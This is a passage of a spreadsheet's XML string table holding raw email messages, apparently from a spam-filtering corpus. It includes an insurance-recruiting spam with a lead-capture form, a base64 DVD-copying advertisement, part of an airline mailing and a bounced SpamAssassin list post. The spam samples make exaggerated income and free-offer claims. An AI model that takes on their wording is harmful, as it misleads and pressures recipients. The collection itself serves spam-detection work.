 MwRGEMkS2xHT2wjvCfc7GL8OMDURwgxgzmMAUAsJAWQzNhFQC6YUIC4dmCAD8HRoINUIYSAOsGwF
 kW0EIAqxZHRuEyFCdQbQHwBiuQngICEKogqECoBEAiBQXCc5MgVAZxEwIB0FEXAJgB6QASAgYnku
 IA7AImAAgXYgcGhvZR7hLB9heXAjsB+wIPcAcCKABGBiAxAgcBDiIfCGcx4wIKRTQVZFJAA/Jlge
 kAOgC4AOsASgYXTeaQIgB0AlUAdAbAQgHlPsUnkAcAtwciGSH1EkY/sfdSXWKitPLF8tby5/L0od
 IKpZCGAhkiiQIHNhCSOBdXAe0G8gNzAuJSdfKeUodWgJ8CB5vwhgMfARIB6TIKQCIGwLgO8qMTPF
 CyAeMCAxEShhA6D3NQIecDaUIANSJKEi8CRU1wuAOLMFoHUCMHIi8CCkvTTCdgQAHmAkozTCdyF2
 7xDwI4EyMTvQcjohAaAIYPk8QWlnHoAztSV0JeU0d/8ociOhB4AekB7BN/EioQ3grGUuIKof8HkL
 gGckoHM4FDnRbGQhhSBQIwBh/wCQEyEksh5gKZQyMAGQKJC7IvARIGMIcEEgNwBTB3BbC1Ai8Gcy
 QDIxaAJAcJA6Ly93R1AuYiAGfR8hbTnwDeAn8yXAHyEvpRhQdwWgc3Qocy83AP8gpDIiMcALcAMg
 IqA30QQA+zGgImBjBzEikhMhAhAFwH8pJSVQNQAyMAeAERBBO0l/RJUAcCPANIAFwAnBJ/Ag/wEA
 KEE4c0zmJLIeojXrIKT/H3UkAB/4CFBISyXlSkUgqgtWX1drfVigAB4ANRABAAAASAAAADxEMTNG
 N0MwNTQ3RDcxRjRDQTQwNzMyN0E4MjUxMzYwMDE5Q0E5Q0BDSE9WTUFJTDEuY2hvLmNvcnAucnlh
 bmFpci5jb20+AAMAgBD/////CwDyEAEAAAAfAPMQAQAAAFoAAABTAGEAdgBlACAAdQBwACAAdABv
 ACAANwAwACUAMgA1ACAAbwBuACAAaQBuAHQAZQByAG4AYQB0AGkAbwBuAGEAbAAgAGMAYQBsAGwA
 cwAhAC4ARQBNAEwAAAAAAAsA9hAAAAAAQAAHMN0ZcUhEUMIBQAAIMJPedUhEUMIBAwDeP59OAAAD
 APE/CQQAAB4A+D8BAAAADAAAAENveWxlLCBTZWFuAAIB+T8BAAAAXQAAAAAAAADcp0DIwEIQGrS5
 CAArL+GCAQAAAAAAAAAvTz1SWUFOQUlSL09VPUZJUlNUIEFETUlOSVNUUkFUSVZFIEdST1VQL0NO
 PVJFQ0lQSUVOVFMvQ049Q09ZTEVTAAAAAB4A+j8BAAAAFQAAAFN5c3RlbSBBZG1pbmlzdHJhdG9y
 AAAAAAIB+z8BAAAAHgAAAAAAAADcp0DIwEIQGrS5CAArL+GCAQAAAAAAAAAuAAAAAwAZQAAAAAAD
 ABpAAAAAAB4AMEABAAAABwAAAENPWUxFUwAAHgAxQAEAAAAHAAAAQ09ZTEVTAAAeADhAAQAAAAcA
 AABDT1lMRVMAAB4AOUABAAAAAgAAAC4AAAADAAlZAQAAAAsAWIEIIAYAAAAAAMAAAAAAAABGAAAA
 AA6FAAAAAAAAAwBwgQggBgAAAAAAwAAAAAAAAEYAAAAAUoUAAFmUAQAeAHGBCCAGAAAAAADAAAAA
 AAAARgAAAABUhQAAAQAAAAUAAAAxMC4wAAAAAAMAuIEIIAYAAAAAAMAAAAAAAABGAAAAAAGFAAAA
 AAAAQAC6gQggBgAAAAAAwAAAAAAAAEYAAAAAYIUAAAAAAAAAAAAACwC9gQggBgAAAAAAwAAAAAAA
 AEYAAAAAA4UAAAAAAAADAMeBCCAGAAAAAADAAAAAAAAARgAAAAAQhQAAAAAAAAMAzoEIIAYAAAAA
 AMAAAAAAAABGAAAAABiFAAAAAAAACwDlgQggBgAAAAAAwAAAAAAAAEYAAAAABoUAAAAAAAALAOmB
 CCAGAAAAAADAAAAAAAAARgAAAACChQAAAAAAAAsAKQAAAAAACwAjAAAAAAADAAYQHr1S2QMABxB/
 AgAAAwAQEAsAAAADABEQAQAAAB4ACBABAAAAZQAAAFdJVEhPVVJURUxFQ09NU1BBUlRORVJCVU1C
 TEVCRUVET05UR0VUUklQUEVET0ZGQllFWFBFTlNJVkVIT1RFTCxQQVlQSE9ORUFORE1PQklMRUNI
 QVJHRVNTQVZFLFNBVkUsU0EAAAAAAgF/AAEAAABIAAAAPEQxM0Y3QzA1NDdENzFGNENBNDA3MzI3
 QTgyNTEzNjAwMTlDQTlDQENIT1ZNQUlMMS5jaG8uY29ycC5yeWFuYWlyLmNvbT4AEOQ=
 --_NextPart_1_bvfoDiTVghtoCXFdvJNKcuWblFV
 Content-Type: text/plain; charset="us-ascii"
 Content-description: footer
 ---
 You are currently subscribed to customers as: zzzz-ryanair@example.com
 To unsubscribe send a blank email to leave-customers-949326K@mail.ryanairmail.com
 --_NextPart_1_bvfoDiTVghtoCXFdvJNKcuWblFV--
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_20F213_01C25430.B7EDE5E0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Outstanding
  Opportunities
  For Premier Producers	
  Our Client's Search Includes:	
  Full-Time Agents 	 Sales Managers	  General Agents	 
  CPA "Partners"	  Independent Agents &amp; Brokers	 
  	 Allow
  their "Nationally Acclaimed" marketing intiatives and unbeatable
 product portfolio to DOUBLE YOUR INCOME within 24 months	
 PLUS ACCESS TO 385 OTHER COMPANIES 	
 For A Confidential Phone Interview Please Complete Form &amp; Submit 	
 Name: 	 	
 E-mail: 	 	
 Phone: 	 	
 City:	  	State:	  	 	 
 Area of Interest:	  	Full-Time Agent	  	Sales Manager
 General Agent	 
  	  	CPA "Partner"	  	Independent Agent	 
 We don't want anybody to receive or mailing who does not wish to receive
 them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.InsuranceIQ.com/optout
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; 
 ------=_NextPart_000_20F213_01C25430.B7EDE5E0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Outstanding Opportunities for "Premier Producers"&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;p align=3D"center"&gt;
   &lt;table width=3D"550" border=3D"3" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#660000"&gt;
     &lt;tr&gt;
       &lt;td&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/NLV/opps/top.jpg" =
 width=3D"550" height=3D"95" alt=3D'Outstanding'&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/NLV/opps/mid.jpg" =
 width=3D"550" height=3D"61" alt=3D'Opportunities'&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/NLV/opps/bot.jpg" =
 width=3D"550" height=3D"75" alt=3D'For Premier Producers'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt; &lt;img src=3D"http://iiq.us/images/NLV/opps/sub.gif" =
 width=3D"360" height=3D"33" alt=3D"Our Client's Search Includes:"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;=20
                 &lt;table width=3D"528" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4"&gt;
                   &lt;tr&gt;=20
                     &lt;td&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;&lt;img src=3D"http://iiq.us/images/NLV/opps/bullet.gif" =
 width=3D"22" height=3D"13"&gt;Full-Time Agents &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;td&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;&lt;img src=3D"http://iiq.us/images/NLV/opps/bullet.gif" =
 width=3D"22" height=3D"13"&gt;Sales Managers&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;td&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;&lt;img src=3D"http://iiq.us/images/NLV/opps/bullet.gif" =
 width=3D"22" height=3D"13"&gt;General Agents&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table width=3D"527" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4"&gt;
                   &lt;tr&gt;=20
                     &lt;td width=3D"168"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif"&gt;&lt;img =
 src=3D"http://iiq.us/images/NLV/opps/bullet.gif" width=3D"22" =
 height=3D"13"&gt;CPA &amp;quot;Partners&amp;quot;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;td width=3D"327"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif"&gt;&lt;img =
 src=3D"http://iiq.us/images/NLV/opps/bullet.gif" width=3D"22" =
 height=3D"13"&gt;Independent Agents &amp;amp; Brokers&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;
             &lt;td width=3D"150" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/NLV/opps/guy.jpg" width=3D"107" =
 height=3D"201"&gt;&lt;/td&gt;
             &lt;td width=3D"400"&gt;&lt;img =
 src=3D"http://iiq.us/images/NLV/opps/allow.gif" width=3D"324" =
 height=3D"138" alt=3D'Allow'&gt;&lt;br&gt;
               &lt;img src=3D"http://iiq.us/images/NLV/opps/ani_double.gif" =
 width=3D"324" height=3D"63" alt=3D'their "Nationally Acclaimed" =
 marketing intiatives and unbeatable product portfolio to DOUBLE YOUR =
 INCOME within 24 months'&gt; &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;br&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5" bordercolor=3D"#000066"&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#006633" align=3D"center"&gt;
               &lt;font face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#FFFFFF"&gt;&lt;b&gt;PLUS ACCESS TO 385 OTHER COMPANIES&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;=20
                     &lt;table width=3D"100%"&gt;
                       &lt;tr&gt;=20
                         &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                           &lt;td&gt;=20
                             &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                               &lt;tr&gt;=20
                                 &lt;td colspan=3D"7" align=3D"center"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;&lt;b&gt;
                                   For A Confidential Phone Interview =
 Please Complete Form &amp;amp; Submit&lt;/b&gt;&lt;/font&gt;
                                 &lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt;=20
                                 &lt;td width=3D"19%" align=3D"right"&gt;=20
                                   &lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2" color=3D"#000066"&gt;Name:&lt;/font&gt;
                                 &lt;/td&gt;
                                 &lt;td colspan=3D"6"&gt;=20
                                   &lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;
                                 &lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt;=20
                                 &lt;td width=3D"19%" align=3D"right"&gt;=20
                                   &lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2" color=3D"#000066"&gt;E-mail:&lt;/font&gt;
                                 &lt;/td&gt;
                                 &lt;td colspan=3D"6"&gt;=20
                                   &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                                 &lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt;=20
                                 &lt;td width=3D"19%" align=3D"right"&gt;=20
                                   &lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2" color=3D"#000066"&gt;Phone:&lt;/font&gt;
                                 &lt;/td&gt;
                                 &lt;td colspan=3D"6"&gt;=20
                                   &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                                 &lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt;=20
                                 &lt;td width=3D"19%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;City:&lt;/font&gt;&lt;/td&gt;
                                 &lt;td colspan=3D"2"&gt;=20
                                   &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                                 &lt;/td&gt;
                                 &lt;td width=3D"8%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;State:&lt;/font&gt;&lt;/td&gt;
                                 &lt;td width=3D"21%"&gt;=20
                                   &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                                 &lt;/td&gt;
                                 &lt;td colspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&amp;nbsp;&lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt;=20
                                 &lt;td width=3D"19%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" color=3D"#000066"&gt;Area =
 of Interest:&lt;/font&gt;&lt;/td&gt;
                                 &lt;td width=3D"5%" align=3D"right"&gt;=20
                                   &lt;input type=3D"checkbox" =
 name=3D"Category" value=3D"FullTimeAgents"&gt;
                                 &lt;/td&gt;
                                 &lt;td width=3D"20%"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#000066"&gt;Full-Time =
 Agent&lt;/font&gt;&lt;/td&gt;
                                 &lt;td width=3D"8%" align=3D"right"&gt;=20
                                   &lt;input type=3D"checkbox" =
 name=3D"Category" value=3D"SalesManagers"&gt;
                                 &lt;/td&gt;
                                 &lt;td width=3D"21%"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#000066"&gt;Sales =
 Manager&lt;/font&gt;&lt;/td&gt;
                                 &lt;td align=3D"right" valign=3D"middle" =
 width=3D"4%"&gt;=20
                                   &lt;input type=3D"checkbox" =
 name=3D"Category" value=3D"GeneralAgents"&gt;
                                 &lt;/td&gt;
                                 &lt;td align=3D"left" valign=3D"middle" =
 width=3D"23%"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;General Agent&lt;/font&gt;&lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt;=20
                                  &lt;td width=3D"19%" =
 align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                                  &lt;td width=3D"5%" align=3D"right"&gt;
                                    &lt;input type=3D"checkbox" =
 name=3D"Category" value=3D"CPAPartners"&gt;
                                  &lt;/td&gt;
                                  &lt;td width=3D"20%"&gt;&lt;font size=3D"2" =
 face=3D"Arial, Helvetica, sans-serif" color=3D"#000066"&gt;CPA =
 &amp;quot;Partner&amp;quot;&lt;/font&gt;&lt;/td&gt;
                                  &lt;td width=3D"8%" align=3D"right"&gt;=20
                                    &lt;input type=3D"checkbox" =
 name=3D"Category" value=3D"IndependentAgents"&gt;
                                  &lt;/td&gt;
                                  &lt;td width=3D"21%" colspan=3D"3"&gt;&lt;font =
 size=3D"2" face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#000066"&gt;Independent Agent&lt;/font&gt;&lt;/td&gt;
                               &lt;/tr&gt;
                               &lt;tr&gt;=20
                                 &lt;td width=3D"19%" =
 align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                                 &lt;td colspan=3D"4"&gt;=20
                                   &lt;input type=3D"submit" name=3D"submit" =
 value=3D"Submit"&gt;
                                   &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"nlv@insiq.com"&gt;
                                   &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"NLV Recruit"&gt;
                                 &lt;/td&gt;
                                 &lt;td colspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&lt;img src=3D"http://63.211.81.87/images/q.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                               &lt;/tr&gt;
                             &lt;/table&gt;
                           &lt;/td&gt;
                         &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;table width=3D"548" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"8"&gt;
                 &lt;tr&gt;=20
                   &lt;td&gt;=20
                     &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"1"&gt;We=20
                       don't want anybody to receive or mailing who does =
 not wish=20
                       to receive them. This is professional =
 communication sent=20
                       to insurance professionals. To be removed from =
 this mailing=20
                       list, DO NOT REPLY to this message. Instead, go =
 here: &lt;a =
 href=3D"http://www.InsuranceIQ.com/optout"&gt;http://www.InsuranceIQ.com/opt=
 out&lt;/a&gt;&lt;br&gt;
                       &lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;br&gt;
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_20F213_01C25430.B7EDE5E0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: How would you like to create your own DVD library? 4863d-5
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00B8_51E06B6A.C8586B31
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 SGVyZSdzIHRoZSBob3R0ZXN0IHRoaW5nIGluIERWRHMuIE5vdyB5b3UgY2Fu
 IG1ha2UgYSBwZXJzb25hbCBiYWNrdXANCmNvcHkgb2YgYSBEVkQgcmlnaHQg
 b250byBDRC1SLiAgT3VyICJIb3QiIG5ldyBzb2Z0d2FyZSBlYXNpbHkgdGFr
 ZXMgeW91IHRocm91Z2gNCnRoZSBzdGVwcyB0byBtYWtlIGEgY29weSBvZiB5
 b3VyIG93biBEVkRzLg0KDQpOT1cgSU5DTFVERUQgRk9SIEZSRUUhIENvcHkg
 UExBWVNUQVRJT04sIE1VU0lDL01QM3MgYW5kIGFsbCBTb2Z0d2FyZS4NCg0K
 LSBTdGVwIGJ5IFN0ZXAgSW50ZXJhY3RpdmUgSW5zdHJ1Y3Rpb25zIA0KLSBB
 bGwgU29mdHdhcmUgVG9vbHMgSW5jbHVkZWQgT24gQ0QgDQotIE5vIERWRCBC
 dXJuZXIgUmVxdWlyZWQgDQotIEZSRUUgTGl2ZSBUZWNobmljYWwgU3VwcG9y
 dCANCi0gMzAgRGF5IFJpc2sgRnJlZSBUcmlhbCBBdmFpbGFibGUgDQotIEZS
 RUUgRHZkIE1vdmllIG9mIHlvdXIgY2hvaWNlIChMSU1JVEVEIFRJTUUgT0ZG
 RVIhKQ0KDQpXZSBoYXZlIEFsbCB0aGUgc29mdHdhcmUgeW91IG5lZWQgdG8g
 Q09QWSB5b3VyIG93biBEVkQgTW92aWVzLg0KDQpodHRwOi8vc2FtLm1vdGhv
 c3QuY29tL3Bvcy9kdmQuaHRtDQorKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrDQpUaGlzIGVtYWlsIGhhcyBiZWVuIHNjcmVlbmVkIGFuZCBmaWx0
 ZXJlZCBieSBvdXIgaW4gaG91c2UgIiJPUFQtT1VUIiIgc3lzdGVtIGluIA0K
 Y29tcGxpYW5jZSB3aXRoIHN0YXRlIGxhd3MuIElmIHlvdSB3aXNoIHRvICJP
 UFQtT1VUIiBmcm9tIHRoaXMgbWFpbGluZyBhcyB3ZWxsIA0KYXMgdGhlIGxp
 c3RzIG9mIHRob3VzYW5kcyAgb2Ygb3RoZXIgZW1haWwgcHJvdmlkZXJzIHBs
 ZWFzZSB2aXNpdCAgDQoNCmh0dHA6Ly9zYW0ubW90aG9zdC5jb20vcG9zL29w
 dG91dGQuaHRtbA0KKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKw0K
 ODQyOVpLWm01LTU4NGJsYW4yODI2enhhRDEtMTM4Qm1uVDYwOThUSWNvNy0y
 MjByaWtnMzYyMGw1Mg==
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Failed mail: Banned or potentially offensive material
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a MIME-encapsulated message
 --==_15304473447567@buffy.jpci.net==_
 Content-Type: text/plain; charset="us-ascii"
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 Your message was not delivered to
     daz@jpci.net
 This mail message contains banned or potentially offensive text.
 --==_15304473447567@buffy.jpci.net==_
 Content-Type: message/delivery-status
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 Reporting-MTA: dns;buffy.jpci.net
 Final-Recipient: rfc822;daz@jpci.net
 Action: failure
 --==_15304473447567@buffy.jpci.net==_
 Content-Type: message/rfc822
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 Received: from usw-sf-list1-b.sourceforge.net ([10.3.1.13] helo=usw-sf-list1.sourceforge.net)
 	by usw-sf-list2.sourceforge.net with esmtp (Exim 3.31-VA-mm2 #1 (Debian))
 	id 17ywHF-0003wQ-00; Tue, 08 Oct 2002 08:28:05 -0700
 Received: from dsl092-072-213.bos1.dsl.speakeasy.net ([66.92.72.213] helo=blazing.arsecandle.org)
 	by usw-sf-list1.sourceforge.net with esmtp 
 	(Cipher TLSv1:DES-CBC3-SHA:168) (Exim 3.31-VA-mm2 #1 (Debian))
 	id 17ywGP-000544-00
 	for &lt;Spamassassin-talk@lists.sourceforge.net&gt;; Tue, 08 Oct 2002 08:27:14 -0700
 Received: (qmail 31751 invoked from network); 8 Oct 2002 15:26:25 -0000
 Received: from localhost (HELO RAGING) (rod@127.0.0.1)
   by localhost with SMTP; 8 Oct 2002 15:26:25 -0000
 Message-ID: &lt;042a01c26edf$16332c50$b554a8c0@RAGING&gt;
 From: "rODbegbie" &lt;rOD@arsecandle.org&gt;
 To: "Odhiambo Washington" &lt;wash@wananchi.com&gt;,
 	"spamassassin" &lt;Spamassassin-talk@lists.sourceforge.net&gt;
 References: &lt;20021008130510.GA23757@ns2.wananchi.com&gt;
 Subject: Re: [SAtalk] spamd error messages
 Organization: Arsecandle Industries, Inc.
 X-Habeas-SWE-1: winter into spring
 X-Habeas-SWE-2: brightly anticipated
 X-Habeas-SWE-3: like Habeas SWE (tm)
 X-Habeas-SWE-4: Copyright 2002 Habeas (tm)
 X-Habeas-SWE-5: Sender Warranted Email (SWE) (tm). The sender of this
 X-Habeas-SWE-6: email in exchange for a license for this Habeas
 X-Habeas-SWE-7: warrant mark warrants that this is a Habeas Compliant
 X-Habeas-SWE-8: Message (HCM) and not spam. Please report use of this
 X-Habeas-SWE-9: mark in spam to &lt;http://www.habeas.com/report&gt;.
 MIME-Version: 1.0
 Content-Type: multipart/signed;
 	micalg=SHA1;
 	protocol="application/x-pkcs7-signature";
 	boundary="----=_NextPart_000_0426_01C26EBD.8DF911E0"
 X-Priority: 3
 X-MSMail-Priority: Normal
 X-Mailer: Microsoft Outlook Express 6.00.2800.1106
 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
 Sender: spamassassin-talk-admin@example.sourceforge.net
 Errors-To: spamassassin-talk-admin@example.sourceforge.net
 X-BeenThere: spamassassin-talk@example.sourceforge.net
 X-Mailman-Version: 2.0.9-sf.net
 Precedence: bulk
 List-Help: &lt;mailto:spamassassin-talk-request@example.sourceforge.net?subject=help&gt;
 List-Post: &lt;mailto:spamassassin-talk@example.sourceforge.net&gt;
 List-Subscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-talk&gt;,
 	&lt;mailto:spamassassin-talk-request@lists.sourceforge.net?subject=subscribe&gt;
 List-Id: Talk about SpamAssassin &lt;spamassassin-talk.example.sourceforge.net&gt;
 List-Unsubscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-talk&gt;,
 	&lt;mailto:spamassassin-talk-request@lists.sourceforge.net?subject=unsubscribe&gt;
 List-Archive: &lt;http://sourceforge.net/mailarchives/forum.php?forum=spamassassin-talk&gt;
 X-Original-Date: Tue, 8 Oct 2002 11:26:32 -0400
 Date: Tue, 8 Oct 2002 11:26:32 -0400
 This is a multi-part message in MIME format.
 ------=_NextPart_000_0426_01C26EBD.8DF911E0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 Odhiambo Washington wrote:
 &gt; After being bitten by bugs in 2.41, I've downgraded to 2.31 but now spamd
 &gt; spews errors like I've never seen before:
 Delete the contents of /usr/local/share/spamassassin and reinstall.  There
 are some files that were new to v2.4x, so they won't be overwritten when you
 downgrade.
 rOD.
 --
 "Fast!  Fast!  Faster!  Bring the beef, you bastard,"
 cries Paula Abdul, "and don't forget the pasta!"
 Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;
 ------=_NextPart_000_0426_01C26EBD.8DF911E0
 Content-Type: application/x-pkcs7-signature;
 	name="smime.p7s"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment;
 	filename="smime.p7s"
 MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJIjCCAnow
 ggHjoAMCAQICARcwDQYJKoZIhvcNAQEFBQAwUzELMAkGA1UEBhMCVVMxHDAaBgNVBAoTE0VxdWlm
 YXggU2VjdXJlIEluYy4xJjAkBgNVBAMTHUVxdWlmYXggU2VjdXJlIGVCdXNpbmVzcyBDQS0xMB4X
 DTAyMDQxODE1MjkzN1oXDTIwMDQxMzE1MjkzN1owTjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUdl
 b1RydXN0IEluYy4xJzAlBgNVBAMTHkdlb1RydXN0IFRydWUgQ3JlZGVudGlhbHMgQ0EgMjCBnzAN
 BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAspcspZISpYX/aJqWoYcSyyGqFby3OvsepRzLRU0ENDJR
 wJo7DwFpirRFOUQkTkKXsY6BQzX/CeCRrn9i4ny5gcXuI2JSyrSmDwobbwl52n5cPEbHGcebybWd
 KfAf8vvkxYUnTmDZPtt2ob5RNpJTeTiq9MpNCB/5G7Ocr1hEljcCAwEAAaNjMGEwDgYDVR0PAQH/
 BAQDAgHGMB0GA1UdDgQWBBQig0tNIAIMMfR8WrAaTRXIeF0RSTAPBgNVHRMBAf8EBTADAQH/MB8G
 A1UdIwQYMBaAFEp4MlIR21kWNl7fwRQ2QGpHfEyhMA0GCSqGSIb3DQEBBQUAA4GBACmw3z+sLsLS
 fAfdECQJPfiZFzJzSPQKLwY7vHnNWH2lAKYECbtAFHBpdyhSPkrj3KghXeIJnKyMFjsK6xd1k1Yu
 wMXrauUH+HIDuZUg4okBwQbhBTqjjEdo/cCHILQsaLeU2kM+n5KKrpb0uvrHrocGffRMrWhz9zYB
 lxoq0/EEMIICgjCCAeugAwIBAgIBBDANBgkqhkiG9w0BAQQFADBTMQswCQYDVQQGEwJVUzEcMBoG
 A1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1c2lu
 ZXNzIENBLTEwHhcNOTkwNjIxMDQwMDAwWhcNMjAwNjIxMDQwMDAwWjBTMQswCQYDVQQGEwJVUzEc
 MBoGA1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1
 c2luZXNzIENBLTEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAM4vGbwXt3fek6lfWg0XTzQa
 DJj0ItlZ1MRoRvC0NcWFAyDGr0WlIVFFQesWWDYyb+JQYmT5/VGcqiTZ9J2DKocKIdMSODRsjQBu
 WqDZQu4aIZX5UkxVWsUPOE9G+m34LjXWHXzr4vCwdYDIqROsvojvOm6rXyo4YgKwEnv+j6YDAgMB
 ------=_NextPart_000_0426_01C26EBD.8DF911E0--
